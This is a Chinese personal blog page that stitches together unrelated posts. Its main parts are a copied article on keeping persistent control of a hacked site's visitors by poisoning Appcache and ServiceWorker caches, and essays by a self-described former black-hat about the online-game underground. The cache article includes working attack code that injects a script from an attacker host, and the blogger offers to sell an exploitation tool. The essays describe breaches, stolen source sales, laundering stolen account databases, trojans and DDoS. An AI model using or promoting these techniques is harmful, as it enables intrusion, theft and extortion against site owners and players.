蛋疼的360前端库

2015年闲下来了重新搭建了这个blog,闲暇之余写点以后自己看的东西,方便以后回过头好知道自己都干了些什么。wordpress有个很恶心的地方就是每次都要替换google的前端库到360的useso,(其实是GFW恶心)谁可曾想360也挂了!我一直以为是vps的问题,导致很慢,因为我每次上网都会挂vps映射到本地,没有卡顿的感觉,今天换了台电脑看了一下,原来全部恢复到了google的前端库,这才换到了中科大学的前端库速度贼快 https://lug.ustc.edu.cn/wiki/lug/services/googlefonts。让我们干了这杯酒,敬GFW,第二杯敬360。

Using Appcache and ServiceWorker for Evil

You’re a bad guy and you just hacked a website. Normally you leak the database and leave. The owner fixes everything next day and removes your backdoor. With Middlekit techniques you can poison browser cache of every visitor and get more money and intelligence in a long run.

They call it “Advanced Persistent Threat” in the cyber snake oil industry. It silently sits in the victim’s user agent and waits for your commands. It can alter responses, proxy requests through your server etc – it is permanent session hijacking and XSS.

mk

I am not going to give you specific software, but will explain two approaches: appcache and serviceworker.

Appcache

It works in all browsers. You just need to add manifest itself in the CACHE MANIFEST section and the browser will always return poisoned documents from the cache.

  • You need to collect as many URLs as possible – you need to list them explicitly to make the user agent cache it. site:victim.com in google is a good start
require 'open-uri'
f=open('https://www.google.ru/search?q=site%3Asakurity.com&oq=site%3Asakurity.com&aqs=chrome..69i57j69i58.2444j0j9&sourceid=chrome&es_sm=91&ie=UTF-8').read

def get_pages(domain)
  f=open('https://www.google.ru/search?q=site%3A'+domain+'&oq=site%3Asakurity.com&aqs=chrome..69i57j69i58.2444j0j9&sourceid=chrome&es_sm=91&ie=UTF-8&start=10&num=100&').read
  r = f.scan /http:\/\/#{domain}(.*?)[&%]/im
  puts r.flatten.uniq.join(' ')
end
get_pages 'sakurity.com'
  • Don’t forget user specific URLs such as “/settings” or “/homakov/direct_messages”. You can generate the manifest on the fly.
  • Insert your middlekit in front of the hacked production server. For demonstration you can run following script locally and add 127.0.0.1 sakurity.com to your /etc/hosts. It also works in MitM attacks over wifi against https:// websites.
require 'sinatra'

wire = lambda do
  if params[:utm_medium]
    r=  "real content"
  else
    r=&lt;<script src="https://evil.com.site/middlekit.js"></script><script>// <![CDATA[
function load(url){ x=new XMLHttpRequest; x.open('get',url); x.setRequestHeader('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'); x.setRequestHeader('Cache-Control','max-age=0'); x.setRequestHeader('Upgrade-Insecure-Requests','1'); x.send(); x.onreadystatechange=function(){ if(x.readyState==4){ document.write(x.responseText); //document.body.parentElement.innerHTML = x.responseText; } } } if(location.href.indexOf("?") != -1){ var u = location.href + "&utm_medium=1"; }else{ var u = location.href + "?utm_medium=1"; } //history.pushState("","",url); console.log("Infected") load(u);
// ]]></script>HTML end r end pages = %w{/ /reconnect /lengthextension /logindemo /peatio.pdf /stealtitle /blog/2015/03/15/authy_bypass.html /blog/2015/03/03/duo_format_injection.html /blog/2015/07/28/appcache.html /blog/2015/03/10/Profilejacking.html /blog/2015/06/04/mongo_ruby_regexp.html /blog/2015/05/08/pusher.html /blog/2015/03/04/hybrid_api_auth.html /blog/2015/03/27/slack_or_reset_token_hashing.html /blog/2015/07/18/2fa.html /blog/2015/05/21/starbucks.html /blog/2015/03/05/RECONNECT.html /blog/2014/01/01/puzzle1.html /blog/2015/04/10/email_password_manager.html /blog/2015/02/28/openuri.html /blog/2015/06/25/puzzle2.html /blog/2015/01/22/peatio-audit.html /blog/2015/01/10/hacking-bitcoin-exchanger.html /triple} pages.each{|page| get page, &amp;wire } get '/a.appcache' do response.headers['cache-control'] = 'max-age=3155760000' response.headers['content-type'] = 'text/cache-manifest; charset=UTF-8' "CACHE MANIFEST /a.appcache #{pages.join("\n")} " end
  • Get as many users as possible to visit the hacked server right now – try a newsletter.
  • Now all of them load your middlekit.html first, and there is no way to destroy appcache with javascript. The admins have to ask every user to visit chrome://appcache-internals/ manually

ServiceWorker

This one works only in Chrome on desktop and only over https: websites, but is actually much more dangerous. It creates a worker which alters responses for all requests and there’s no need to explicitly cache every page – you can cover entire domain with one worker.

onfetch=function(e){
  e.respondWith(new Response('<script>// <![CDATA[
alert(document.domain)
// ]]></script>',{headers: {'Content-Type':'text/html'}})) }

To install a ServiceWorker the browser wants to see it as a response with content-type:text/javascript. Pinky, are you pondering what I’m pondering?

Lots of JSONP endpoints respond with arbitrary JS. For instance look at my challenge, this is the answer.

In other words XSS + JSONP + ServiceWorker = Permanent XSS on every page

Recap

Appcache is too late to fix, and it’s going to be perfect cache poisoning tool for a long while for both hacked websites and insecure connections (yet another reason to avoid https:// when you’re on someone’s wifi).

ServiceWorker is very young and powerful technology, and should be implemented more carefully, taking into account how common JSONP endpoints are. I believe it was a bad idea to allow any text/javascript responses to become a ServiceWorker. At least it should be an extra header Service-Worker:true or explicit Content-Type:text/javascript-serviceworker.

Supplement

需要利用工具的可以邮件联系 24a4de1216a63be9[at]gmail.com,目前可利用环境Apache2.2.32以下。(非免费) 或者你有更屌的持久化劫思路可以与我分享,一样付费!

网络游戏在黑色产业链处于什么样的地位

ss_1802c10e1e362256ef9742aaa9077f0cddd3db20

今早起来发现专栏突然人数剧增,受宠若惊。很高兴大家能对这一偏门话题敢兴趣,本来最近挺忙的,但是看到这么多人关注还是决定再更一篇,下篇文章就不知道是什么时候了!简短的一个介绍吧;本人伪文艺,做黑产出身,这些年赚的钱倒是不少,但所剩无几。步入三旬,一如少年模样!
我从05年开始从事游戏行业直到2012年,标题《网络游戏在黑色产业链处于什么样的地位》,这个问题先肯定的回答一下。除菠菜行业外,无与伦比!我们先来看一下游戏产业每年的营业额及市场规模。

图为2009-2015 年中国游戏市场销售收入

v2-fbd66a2455132b6d24369b89b42adff2_r

图为2011-2015年Q1-Q3中国网络游戏市场规模

v2-bb2d9aeced19a074bd24ac14f9931d4d_b

收入堪比国企,这也能解释为什么各大网络公司全都要一头扎进网络游戏这块沃土,为什么各大视频网站上全都是游戏广告,为什么各大明星一个劲的代言网络游戏。(网页游戏目前在游戏市场的比重仅仅只有不到%15,大家脑补一下现在的端游和手游的收入。)

我把网络游戏中的黑产分为一下如下几个过程或者说阶段,每个阶段都有巨大利益产生!

_1 源代码、游戏端

_2 游戏金币、游戏装备、

_3 外挂

_4 游戏工作室

_5 游戏钓鱼、游戏木马团队

0x00 源代码、游戏端

我先举一款游戏作例子,GTA5。这款游戏的开发公司是Rockstar Games,据说花了2.65亿美元开发,花费了五年的时间,不得不说这是一家伟大的公司。国外的游戏公司做任何游戏都会比中国强的原因我个人理解为中国的公司浮躁,不舍得花钱。“能用十万人民币套现五十万的事情,绝不会用二十万去套现五十万”,这是中国游戏行业的瓶颈!

游戏公司花了2.65亿来开发这款游戏,那么他的游戏端或游戏源代码到底能价值多少呢?以我的经验来评估一下,如果GTA5的游戏端泄露的话市场价值应该在500万人民币左右,如果有源代码的话可能就是翻三倍吧,一千五百万。但这份源代码落到游戏公司去的话,产生的价格就不得而知了,做游戏这些年从没接触过到销售这一环节,不是接触不到,是懒!

在13年的时候我们团队尝试了一下黑进Rockstar Games,但无果。这是当时对几个外部web扫描的基础信息。

v2-c210ebd275f968ad1f01475043f350e3_b

v2-b15a6143526066751052e98d688b1883_r

任何游戏端和游戏源代码都有他的价值,这些年手游的兴起,连手游的游戏端都能卖钱了,当然,聪明一点的游戏团队不会碰国产游戏端/代码,不是因为国产游戏垃圾,而是风险度是%100。碰则死,所以国外的游戏端和源代码才是我们的挚爱。我制了一份游戏端价格表,大家可以看一下,也可以看一下这个市场有多疯狂,还有人记得当年的99nets吗?

v2-85cbf059c16fcd62f3df77df84ee7cab_r

v2-8a923c7a7a98fdeb49e4172cf2285b1e_r

以上价格有差异,当然我是问了国内还在做这方面的朋友征求的价格。一些商业黑客,赏金猎人最喜欢的就是刷库和游戏端,当然游戏源代码难度太大国内没多少黑客能搞定,寥寥无几,我数过去数过来也只有为数不超十个大牛或团队能搞定。难度大到什么程度呢?首先要突破游戏开发公司的边缘网络到OA内网,找到核心管理员,干掉那台物理隔绝的服务器,最后再到SVN拿到各个版本的游戏源代码,也不一定齐全。以前在团队仅成功过一次。战绩如下,一款比较牛逼的游戏。

v2-eaf626344646d423b00a686437cad76a_r

拿到游戏端或者游戏源代码的工作室肯定就是开私服了,去掉了开发费用,二次修改程序,已经有了开发公司的推广,只需要做的就是私服推广了,让我想到了一个广告“没有中间商赚差价,人人库:)”

我们看一下诛仙私服:

v2-65a8cc52fc95be4289f596afa868c06f_r

付上一段聊天记录。自己脑补

v2-0f2a8d413f05a05f5fd713e22eb2db2f_r

v2-8aab682273ac74268a4dcb4c8b5fe670_r

总之这个是黑客们的最爱,拿到后一次性就能得到一大笔钱,风险也最低!当然要看游戏了,如果碰了国内的游戏,那就死定了!这是我的经验之谈,不要走我的老路!切记!!!

0x01 游戏金币、游戏装备

说到游戏金币和游戏装备就不得不说的是游戏工作室了,游戏打金已经从热血传奇那个年代到现在成为了一种职业,养活了不少游戏玩家。疯狂程度可以看一下比价器。

v2-89a90c014352bc9583d1cc11116d99c6_r

v2-d2fdc8af7968ac0815094eecaff265bd_r

国内的游戏工作室现在目前有过万家,甚至有很多个人玩家买了几台电脑也算一个小型的工作室,遇到好的游戏和外挂每天每台电脑的收入可以达到500,当然有人靠这个发家,就有人因这个落马!印象最深的游戏是D3(暗黑破坏神3),那是2011年底吧,当时D3登录美服,金币价格1E=780,这是最早的价格,一台八核高配电脑每天挂30个号,每天可以靠打金收入800~1200块钱,成本有哪些?外挂,激活码,激活码当时一个是6 7百人民币,用国外信用卡刷的黑激活码也是300-400,当时哪管那么多啊,工作室砸钱啊,使劲砸,买大批激活码,外挂,那三个月衣钵满满,机器越多赚的越多。可惜好景不长,暴雪开始封号,几百块钱的激活码号全部被封,有些工作室倾家荡产。

游戏金币算一个游戏公司的虚拟财产,我之前讲过,任何一款游戏都是被游戏工作室给提前终结生命的,这话没错。本来游戏公司会有更多利润可图的。总要分一杯羹给游戏工作室。当然暴雪是游戏工作室的噩梦,一朋友的号被封了让翻译致电暴雪,暴雪原话是“游戏是我们开发的,游戏内的所有金币账号都是我们的。你可以选择不玩!”这是暴雪的游戏态度。

游戏金币大家可以到比价器去看一下,稳定的游戏货币没有多少,我说的D3也从最高的时候的780=1E金币,掉到了现在的12块=1E金币。

0x02 外挂

游戏外挂是游戏产业中最重要的阶段,外挂的销售渠道比乐天的销售渠道还要大,分工明确,利益最大化!外挂作者重金难求!外挂的销售可谓是非常细,总代,二级代理,三级代理,分销代理,市场推广,反馈专员,等等。

就DNF(地下城勇士)这款游戏来说,2010年一南京的哥们应该是跑路到国外了吧?听说获利1000万跑路,这位大牛的名字有人听说过吗?DNF有人玩过的话,应该知道是一个类似“闯关刷怪”的游戏,当时这款挂进图一秒秒杀全图怪物, 直接进入第二层。这么变态的东西,能不跑路吗?这东西在工作室产生一个月利润可以打到上亿的利润,那可是2010年!

抱歉这个重要阶段了解不多,不是做这个方向的。欢迎评论补充!

0x03 游戏工作室

把游戏工作室和游戏金币分开是他们有一些关联,但又和黑客在他们之间的关系分开。我认识的游戏工作室大多数不光做游戏打金,还做游戏洗库,刷库,游戏金币贩卖收货,不然怎么能撑起来那么大的开销,一个标准的游戏工作室应该有100台八核高端机器,足够的人手,数条光纤,这个全国应该问福建龙岩和厦门的老哥取经了。

v2-0d3b8245c954346ad86d7fededa8ed52_r

像这样一份游戏库,里面带了金币,和游戏银行金币,和二级密码的,工作室收了黑客这样一个库第一件事是干嘛呢?请人写批量登录啊,登录以后要首先筛选金币数量,然后开始安排人和机器把数据分成多少分分给下面的人开始一个号一个号进行洗,所谓洗洗更健康就是说这个。这里有非常的技巧,洗库最重要的就是时间,像一个200W账号的游戏库,必须要在一周的时间内全部消化干净,不会让你一个号一个号慢慢操作的,操作慢了游戏公司会采取一些二次验证的手段,你这库就废了。

洗库大家都知道怎么回事,很少人知道刷库是什么意思。举个贴切的例子,我们在得到银行的权限以后拿到了所有的银行卡和密码,给别人来洗。刷库的意思是你提供账号密码,我刷1000万到你的账号密码上面,操作简单。你只管贩卖就够了,然后这样的权限实在难得。之前我知道有一个朋友搞日本的游戏,刷库刷了整整五年,但是每天他只刷2000块钱的金币。这里面需要非常大的智慧和经验,这就是渗透中的动态思维的魅力。

0x04 游戏钓鱼、游戏木马团队

现在的游戏钓鱼无非就是游戏喊话,然后获取一些玩家的联系方式,发送诈骗短信,诈骗邮件进行骗二级保护的方式,这个有人在做,我知道有一个工作室用问道喊话“新手领取礼包”这样的方式每个月收入过30万,没有什么技术含量,但是欺骗也是一种艺术。毕竟玩游戏的没几个人动脑子的。

游戏木马团队又要高明很多,伪装,贩卖,传播、三个阶段,传播阶段与钓鱼有异曲同工之妙,更高级一点的就是挂马了。市面上很多11合一,13合一的游戏马,意思就是11款游戏只要登录就可以到收信地址里去找账号密码了,厉害的马,还能破OTP!这都是空手套白狼的项目了,只管收钱即可。

0x05 补充

黑客最喜爱的游戏公司排名:NEXON、NCSOFT、WEMADE、webzen、Ggame、hanGame、softstar、origin。

最后说一句抱歉,写得比较潦草,毕竟没有稿费,文化程度也不高:)你们将就着看!

还是那句话,做黑产我只服两个人,河马与安静,有听说过的朋友我们与君共勉!

不定期更新,没有文笔,内容也不会一气呵成,但一定真实。欢迎关注 黑产纸牌屋

加入我们?

可以发私信给我。

joker

a84a571c-b45f-470f-bd11-9240ec91201a

文/阿童木

此前我写过一篇文章,给了一些漂泊在北上广深苦苦追寻或苟延残喘的年轻人们一点小小的建议。但说来惭愧,我自己就是一个离开小县城在大城市里蜗居着忐忐忑忑勉强维持生计的年轻人,我看着自己佯装过来人一样的分析真是感到自己咋那么不要脸。但欣喜的是,很多读者看了以后都留言说帮助他们解开了心中的焦虑,真是感谢。

但事实上,在那一篇文章里,我只是讲到了来到城市不久的年轻人的焦虑与选择,但这却远远不是全部。当我们还年轻,当我们的父母还身体健康,当我们还没有养育孩子的压力,当我们看到我们的收入依然在不断增长,我们所将要面对的真正的问题还没有到来,那个不可知的未来依旧不可知。

最近,我去上海参加一个行业论坛,和几位圈子里的前辈聊天。他们大多数是外地人,来到上海十多年了,他们有车有家庭,在上海有着按揭付款的房子,但他们之中大多数没有没有上海户口,他们年薪多数在50万元左右。

对于一个普通人来说,这样的收入也算是奋斗的一个顶峰了。他们的这种生活方式和财富拥有的程度,也算是中产阶层吧。照理说,中产的生活应该是最为幸福的,但事实上,这些在大城市的新住者们却都异常焦虑,而且这种焦虑比年轻奋斗的时候更甚,因为他们不知道未来。

留在在大城市?没有户口,孩子的教育是最主要的问题,迟早要回去高考。家里的父母双亲逐渐年迈需要照顾,而他们却在千里之外。哪怕你有了足够牛逼的经济能力你要把父母全都接到大城市,可是你的父母真的愿意吗?他们一大把年纪了还要再被逼无奈断绝自己所有的熟人联系来到一个完全陌生的城市,而且连医保社保都不一定搞的定。再中国的传统文化中,“落叶归根”是一个人一生的最大理想,可是呢?

那难道在事业成功之后,赚了钱之后就回老家去?回去干什么呢?当习惯了大城市里的公平竞争和日新月异,回到那个闭塞又处处开后门的小县城,我们真的能适应吗?我们明明可以再努力一下就获得更大的成功,为什么就放弃了呢?

我们赚了钱回到小县城做什么呢?如果你是做互联网、做营销公关、做新闻媒体等等的工作,你回到小县城面对的是一片无助与迷茫。你把赚来的钱投资搞个小饭馆?开个小超市?或者托后门去去当地的事业单位挂个职位?呵呵,你一个离开家乡十几年人,根本无法再重新回来融入当地的圈子。

那么,未来究竟在哪里?
答案就是,根本没有未来。

来和你的奋斗、你的收入无关,和你能不能买得起大城市的房子无关,和你有多少的积蓄无关(那1%的超级富豪暂且不论),你所面临的是一个矛盾,一个来自于你的家庭的压力,来自于这个国家这种制度的限制的矛盾:就如同我之前所说的一样,你以为你足够努力就能获得自由,但其实,有一个巨大的透明的网在限制着你——这就是你所背负的家庭——你的父母、你的爱人的父母、你的孩子——虽说父母是无私的,但你的父母绝不应当为了你的梦想和选择而失去自己的生活——还有你所面临的制度:户口的难题、看病的难题、买房的难题——一切的难题你无法解决。

但你如果回到家乡呢?就如同三十多年以前那样,你在计划中长大,然后接收了国家分配给你的工作,一干就是几十年,直到退休。那时候你生活在一个极其稳定的,几乎一成不变的年代。人们各司其职,各得其所,没有变革,没有挑战,当然也不可能有真正意义上的自由。个人服从国家安排,服从组织分配,那个年代差不多就是这样,可以一眼望穿自己的人生去向。组织会帮你安排好一切:吃食堂,住宿舍。而你也不用为孩子的事情操心,反正孩子的成长路径也和我一样而已——那个时候,你也不会羡慕所谓的大城市,一来你根本没有资格去大城市工作;二来所谓的大城市,也并没有多少更繁华的地方——也许这种生活也是不错的,这可能是就是如今很多人想要的稳定、文艺而小资的生活——然而,这种病态的稳定带来的却是普遍的贫穷与人性的压抑——于是这种制度这种生活,轰然倒塌。

在那个时代,以为自己可以稳定一辈子的年轻人们,在这一套生活规则倒塌的时候迷茫无措,他们觉得自己被骗了——但其实,只是自己的内心骗了自己。

三十多年前,那些拿着铁饭碗的年轻人,永远都不会想到下岗和破产,永远不会想到股市和理财,永远不能理解为什么房子是商品,永远不能明白为什么会出现北漂一族。这就是变化啊,永恒的变化。

理解我所说的了么?我不知道漂泊在大城市的最终未来在哪里,因为我所有的分析、研究、展望都只能是基于现有的生活模式和制度去分析:但是变化实在太快了,这个国家正在艰难地转身,我永远都不知道十年或者二十年之后世界的样子——哪怕我翻开历史,哪怕我分析从经济角度去分析,我也不知道——历史哪怕再相似,也不会永远都一模一样。

所有怎么办呢?我取了一个这样的标题,然后自言自语说了一堆没用的废话?
但这些,真的不仅仅是废话。

这个世界上绝对没有两全其美的事情,任何事情都有两面性。你想要生活得更自由,就必须承担相应的不安。你想要稳定与安全,就必须按耐自己躁动的心。这是常识而已,没有什么可以讨论的。自己的选择,只能自己来做,并且对你所做的选择负责——这就是生活。

未来不可知,未来不可期,哪怕是邓公也在改革开放初期的时候说要“摸着石头过河”,无论用什么方式过河,我们只要到对岸去就好了,而对岸是什么?对岸就是快乐与幸福。

战乱中长大的40后当时也不知道自己的未来在哪里,经历了饥饿和贫穷的50后当时也不知道未来在哪里,以为把握了未来的60后却不小心失去了未来,再大变革中成长的70后当时也不知道未来在哪里——但现在回首过去,这一切都太清晰了——在大城市中用青春交换梦想的80后、90后的未来到底在哪里?也许,二十年后,就清晰了。

这是最好的时代,这个时代有最好的自由和财富;这是最坏的时代,这个时代有最多的迷茫和焦虑。但无论如何,我们无法选择我们所处的时代,我们能做的,只是努力做好当下,保持自己当下的快乐与激情,仅此而已。至于,我们到底应该如何向前,其实鲁迅早就说过了:这个世界本没有路,走的人多了,也就成了路。

重庆小闲如何运营?(上)

mir220170228
图为重庆小闲在线的热血传奇线下聚会。

这个话题非常非常大,一时半会写不完,真要聊的话,促膝长谈三天三夜不一定能聊完。所以我把这篇文章分成了个篇章,我就随便写点皮毛。

重庆小闲在线科技有限公司介绍自行看百度百科,(下面统称为小闲在线)。我们先来看看小闲在线旗下有哪些产品?热血传奇系列产品、 五四棋牌、开服网、365GM、等等。它是一家以热血传奇这款游戏为主的一家公司。我重点强调一下这个“等等”,这就是我们要写的内容。我们看到的只是一些能拿得上台面的东西,这没必要写,底下的花样才是我们要去挖掘的。

其实小闲在线并不是一家能有多少技术含量的公司,说的简单一点,开个传奇私服是多大一点事呢?与其说这家公司是一家科技公司,不如说这是一家金融公司,与其说这是一家金融公司不如说这是一家玩政治的公司。但这家规模程度还不及一家中等科技公司但非常有钱。归根结底,小闲在线的战略就两个字,垄断

百分之八十的人第一次听说这家公司应该是在原始传奇(5PK)刚刚开始推广的时候。首先小闲在线在拿到了所谓的盛大授权后,成立了5PK,然后发布当时最火的热血传奇版本。1.70 1.76 1.80 1.86,大家都知道这几个版本应该是传奇长征路上最赚钱最经典的几个版本。既然说到了授权,最应该提的是这个拿到授权的代价。网上传了很多个版本,自从那篇报道“游戏私服大佬蔡文再遭抓捕 律师称这行来钱比贩毒都快”之后,有报道说小闲在线的是和盛大的高管勾结才拿到的授权,http://mir2.sdo.com/web7/newsdetail.html?id=15297 这是授权内容。我觉得愿意相信这个解释的你们的眼光太狭隘。一家股份制公司在这样的一个重大决策下一两个高管是没有这样的决策权的。授权内容中也提到了热血传奇的开发公司Actoz Soft,后来Actoz Soft连盛大一起告了,根本没有给重庆小闲授权。但生米都煮成熟饭了,这种版权官司毕竟是一场持久战,最后不管谁输谁赢,最后的赢家都将是小闲在线。小闲在线花了多少的代价取得了盛大的授权我想除了天文数字以外,应该还有一份分成协议吧?

再次科普一下传奇私服是何等的暴力,当年我在读高一的时候,一个月的生活费是400人民币,后来跟三个同学开了一个传奇私服,服务器和广告费第一个月花了大概800人民币,后来每个月私服盈利过3000,具体多少也忘记了,最后跟同学因为钱闹得不愉快关服的时候还有几百个玩家。但直至今天单靠传奇游戏本身盈利简直是天方夜谭了,有人还在讨论百区的成本,原始的成本,点卡钱,那些只是大海里的一根银针罢了。但这样的公司服务器和推广成本也不是一个小数字,不要用一些个人开的私服成本去计算。

上面我也说了小闲在线肯定和盛大有一份分成协议的,下篇 重庆小闲如何运营?(下)中我再慢慢说明。有时候我在想小闲在线这个角色怎么去定义,不如我们定义它为盛大网络请的打手吧。小闲在线在拿到了授权以后,做的第一件事情就是垄断。做了三步垄断,GM垄断,推广垄断,以及细化到版本垄断。

先说一下什么是GM垄断,也就是小闲在线公司现在旗下的365GM,我们想开私服就必须要找版本和服务器以及游戏引擎,而他们就为你提供了这一条龙的服务,从小闲在线的这一条龙服务出来,其他的GM网站不是被收购就是打压,他们的武器也很简单直接,就是DDOS。(DDOS没有什么技术含量,但今天的DDOS是需要非常大的金钱支撑的,这才是小闲在线的根本。如果有对黑产艺术感兴趣的朋友可以关注我的知乎专栏“黑产纸牌屋https://zhuanlan.zhihu.com/zhipaiwu

推广垄断也就是私服发布站,这是整个一条龙服务里的核心。大家还记得当年的haosf、sf123、sf999、吗?可能有人不太愿意相信一个破页面,每天的收入达到了六位数,每年净收入过亿吧?是的,haosf做到了,很巧合的是当年haosf的服务器就坐落于山城重庆。大家可以百度搜索一下传奇私服。如下图

我们再打开看看底部信息。很大气的告诉你重庆小闲在线科技有限公司版权所有。

WTF!私服都有公司了?小闲在线一统私服江湖,千秋万代。光这几个发布站的收入每天破三亿应该是轻轻松松的。但是这背后的代价也是非常大的,DDOS的成本现在是越来越大,2012年的时候朋友包了几个G口机房做魔域私服垄断,每个机房的租金每年是70万,传奇私服发布站这种级别的老板身价可想而知。

什么是版本垄断,我们搜索一下1.76复古传奇。看下呈现出来的内容。除了百度给推广的网页传奇以外,更多的是传奇私服发布站,而这些发布站就是要经过小闲在线的授权的,不授权就是D,这是一个“讲道理”的互联网时代。

整个热血传奇产业链非常的细,也分工明确,堪比IBM。一时半会真的写不完。小闲在线确实做到了一统江湖,但在这背后没有盛大的默许,又有谁能做到呢?留下的疑问很多。譬如

小闲在线购买盛大授权的初衷是?
小闲在线在热血传奇游戏内设立赌场为何被抓?
盛大高管为何落马?
小闲在线现在在做什么?

关注传奇百区,关爱女性健康。听三旬慢慢给你讲故事。今天就写这么多,这篇文章的下文继续写小闲统一江湖后,又将如何洗白?

欢迎大家留言与我交流,也可以在群里交流。百区的故事很多,小闲的故事一样多。

如果你也跟我一样还在玩热血传奇的话,欢迎关注微信公众号-传奇百区。

qrcode_for_gh_d934aa5bc3d7_258

隐藏在互联网背后的蹊跷(序)

peien

2017年除夕夜,突发奇想决定写一个深度分析黑色产业链的专栏。在写这篇专栏之前,我就在想两个问题;这样是否会触及到某些大黑阔和黑产老板的利益,另外是否会有警察蜀黍找我喝茶聊天。犹豫再三,决定还是写出来。文笔有限,我不知道写出来是否会有人会看会关注,但是我知道,至少会比外面的一些安全专家,安全团队凭空捏造,道听途说的好。因为我是做安全出身,甚至说做黑产出身。我会把各个领域(政治、金融、游戏、菠菜、广告、教育、等)的黑色产业链从获取,包装,贩卖,获利,等等的一条龙运作写得更完整一些,这些黑产团队或者说黑产集团从最初的个人利益升级到公司利益,集团利益,里面掺杂着各种因素,和各种错中复杂的关系,黑色产业链从最开始捆绑关联的黑客,商人,到后面的一些上市公司,黑恶势力,政治团体,甚至到一些军事团体,这场游戏谁才是真正的主宰者?

我知道要坚持写下去很难,甚至连专栏名称都没想好,因为我们都很懒,但又都想做点什么….

这样吧,老夫这里有个二维码,闲着蛋疼的时候我会更新点内容,可能是你根本不想了解的,但….我根本不会care你,先这样吧,扫了这个二维码,从此开车不会怕!

原文:https://zhuanlan.zhihu.com/p/25032691

电影老炮儿观后

不配图了,介绍也不写了,自己百度吧。

首先我个人觉得《老炮儿》这部电影是我近两年看的电影除了《夏洛特烦恼》以外的另一部好片,原谅我没看过什么好电影。我理解的好电影是一部与你有共鸣,切身感受,戳中内心深处的才算一部好电影。电影是大艺术,个人觉得艺术造诣很高很高,然而现在大部分的电影为了商业需求,各种骗眼泪,博取同情,“卖肉”,“恶意炒作”,瞎几把释放情怀,来谋取利益,利用演员效应,才有了现在的天价演员,要换到早些年,演员不过是个职业而已,叫做戏子。这是中国电影市场的一种常态,因为中国老百姓傻,(我这里所说的傻是指老百姓见到的好艺术品不多,什么都能接受,也不挑,因为好的东西广电不让播,因为我们就是第二个朝鲜嘛)这里我不是侮辱老百姓,因为中国这个环境下,国家需要你傻,验证了那句话叫“有些事你少知道点好”,所以….

首先,我在北京呆了好些年,老炮儿这词我也是第一次听说,再次原谅我没见过什么世面,因为我压根不怎么出门。电影开始的第一句话“嘛呢”就让我回忆起了在北京的味道。只知道冯小刚是拍电影的,没想到演电影也这么出色,这可能是真正的本色演出吧。其实我看电影不怎么看演员阵容,好的演员不是捧出来的,是金子总会发光这话没错,烂泥扶不上墙和朽木不可雕这话也没错。我看完一整部片后最先蹦出来的一句话就是“吴亦凡和李易峰演的是TM什么玩意!”,商业需要也不用找他们吧,这么好的一个本子,拿来就这样搞?要么说中国老百姓没见过什么世面嘛,人家韩国人随便弄点啥团体的一个个跟打了鸡血,下了降头一样往前冲,脑残粉之多。对了一般的脑残粉都会有这样的一句话“你们不知道xxx有多努力”,我努力你奶奶个腿,说得好像是你养大的一样,自己先努力好再说吧!要有那么大一平台,换我也努力啊,而且我还不出轨!

喷完了心情舒坦了很多,倒不是嫉妒他们有多帅,而且他们真的帅吗?我不认为啊,一副没见过世面的样子!难道我不帅吗?(自信脸:)),帅的定义不同,而且我发现喜欢他们的人都是一些二线城市或者一线城市的小屁孩,不是吗?TFBOY,SNH48这样的团体我更欣赏的还是背后的营销团队,确实厉害,水军价格应该涨价了不少,当年的网络水军的阵地也从天涯到了贴吧,从贴吧到了新浪,搜狐,最后转移了大阵地到了微博。不知不觉又喷了一段,爽啊。

—-以上都是我的“喷他秀”,我要做一名合格的喷子—-

个人先给演员打个分吧!

1.冯小刚,演技99分,原谅我没见过什么世面,在我心中树立的真正的老炮儿形象!
2.许晴,演技95分,这个因为不是一个年代的人,第一次知道她是在《花儿与少年》,这次的演技直接转为粉丝。
3.张涵予,演技98分,不能比冯小刚高了。他演绎的北京流氓的那股狠劲,我承认,我怂了。
4.李易峰,1分,这一分不是给演技的,是你确实要比吴亦凡看起来顺眼一点。
5.吴亦凡,0分,本来想为他那句“你是猴子请来逗比的吗?”打个负分,但他的那辆保时捷被划了问人家要了10万,是属于良心价,给他搬回了一分,有钱人家的孩子还没有学会坑人!
6.其他的演员都是老演员了,真心不错,演技没得说,而且还有一些隐藏的BOSS在里面。

继续讲讲演员吧,我说了这部片最大的败笔是李易峰和吴亦凡,其他演员的演技真的实在太好,个人觉得配角鲁诺饰演的阿彪演技远远的超过了他,其实我印象最深的还是张一山客串的路人甲(实在不知道叫啥)和刘云龙演的弹球儿,因为年龄相仿嘛,当年我在北京的时候正好是那个年纪,所以特别的有感触。弹球儿我那个年代的老北京的小孩,整天游手好闲,什么都愿意掺和,爱平事儿,瞧不起外地人的,一副爱谁谁的样子,但是极其的“懂礼貌”,因为北京话的您用的恰到好处。

我在知乎上看到这样的一个问题,吴亦凡的角色由谁来演最合适,其实我看了下答案,我觉得最合适的人应该是张默,张国立的儿子,演过电影也吸过毒,标准的北京后现代大院子女,有人推荐张一山来演,其实我觉得张一山在里面的角色不太适合他,如果演吴亦凡的角色,不够狠,如果演李易峰的角色又太稚嫩了,当然演技没得说。

另外上面我也说了,隐藏了不少的BOSS在里面,都是我特别喜欢的演员,真正的演技实力派,连奕名,于和伟,张译,郭京飞,等等,再去看看马元,丁武,管宗祥,的背景,纯正的北京大院文化熏陶出来的。《血色浪漫》中的顽主就差刘烨了,刘烨要是再年轻那么一点,我觉得李易峰的角色非他莫属。

“有些事,咱还是得办!”这句话是我对整部片印象最深的一句,这也是整部片要表达的思想,老炮的原则!其实北京我认为当年那个年代分两种孩子,一种是普通老百姓从胡同出来的,另外一种就是部队子女,大院儿出来的,可以去看看《血色浪漫》这部剧,这部剧我也是反复看了不下10次的剧。最后冯小刚的那套衣服和那把军刀就是当年大院的标配。我记得是张涵予饰演的闷三送给他的,闷三本身应该也是一个大院的孩子,可能他父亲那一辈碰到了政治审查,所以沦落了。血性还是在的。这句话,我理解的意思是“做事要思考,知道后果!”这就是为什么这部剧前面一直说了,现在这帮小孩下手没轻没重的意思!

剧情就不多说了,自己去看吧,值得推荐。再说说电影的场景设定吧,要知道在北京开着法拉利和在深圳上海开着法拉利飙车可是两种不同的概念,档次差太多了。天子脚下非官即富,整天游手好闲,吸毒,泡妞,飙车,吃喝玩乐,炫富。除了这些事儿应该没别的事儿了。都已经是北京的富二代和官二代了,整天的混迹于一个破修理厂,而且找的女朋友也是什么鬼,一个个跟坐台小姐一样。这是电影成本不够了吗?这部剧也没花多少啊。

